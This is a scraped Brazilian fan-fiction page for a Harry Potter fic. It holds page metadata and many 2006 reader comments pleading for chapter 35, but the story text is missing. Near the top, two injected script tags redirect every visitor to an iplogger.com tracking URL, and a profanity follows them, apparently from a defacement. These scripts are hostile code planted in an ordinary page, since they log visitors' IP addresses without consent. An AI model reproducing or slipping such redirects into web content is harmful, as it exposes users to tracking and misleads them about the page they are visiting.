","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

Foda-se


Compartilhe!

anúncio

Comentários (2867)

  • pow axei a sua fic taum interessante q li ela em 1 dia!! pow to adorando a historia posta pelo amor d Deus o capitulo 35!!! bjos e c o Harry naum morrer escreva outras fics dele bjus e parabens!!!!

    2006-06-25
  • atualiza!!!!!tow muito ancioso!!!!!!sua fic eh perfeita!!!eh A fan fic!!!!!atualiza logo, plx!!!!! bjo!!!!

    2006-06-25
  • PELO AMOR DE DEUS SE VC NAUM ATUALIZAR NAS PROXIMAS 24 H EU VOU MORREEEEEEEEEEERRR EU NAUM CONSIGO PENSER EM OUTRA COISA!!!!!!!!!! NEM ESTUDAR EU CONSIGO!!!!!!!!ME DIZ POR FAVOR QUANDO VC VAI ATUALIZAR

    2006-06-25
  • Oi!!meu nome eh thais e eu queria saber por favor quando vc vai atualizar .eh serio eu tenho varias provas essa semana e naum consegui estudar p nenhuma por favor eu te implorooooo me manda um e mail dizendo a data....sei que vc deve receber mtos emails iguais a esse pq vc eh simplisment BRILHANTE mas tenta responder o meu tah? mil bjxxxxxxx p vc !!

    2006-06-25
  • A nota é 5 por que nao tem um numero maior nesta caixa, mas eu daria 100 se pudesse. Adoro o jeito como voce escreve, é muito parecido com a J.K.. Também escrevo, mas nao é nenhuma fic, é uma historia minha mesmo, uma aventura sobre um dragao. Espero que voce possa ler tambem quando eu conseguir terminar e publicar, porque vai ser um livro (eu espero). Continue escrevendo sempre!

    2006-06-25
  • adorei sua fic mto legal mesmo ve se passa na minha depois eh nova eh minha 1ª fic por isso seu coment seria legal e me dê idéias...... http://www.floreioseborroes.com.br/menufic.php?id=12458 bjin

    2006-06-25
  • E ai, quando chega o ultimo capitulo?

    2006-06-25
  • Sonia, não aguento mais, estou anciosa..........preciso até de remédios...........cd o 35?????????????? ai como custa esperar............um abraço, um beijo e um pedaço de queijo........ Antonieta

    2006-06-24
  • Oiiii!!! A fic tah otimaaa!!! Parece mtt cm as historias da J.K msmo!! :p Mais vai demorar pra sair o capitulo 35??? beijoss

    2006-06-24
  • mt boa, a sua fic...cap 35° logo...estou curiosa, parabens!

    2006-06-24
Você precisa estar logado para comentar. Faça Login.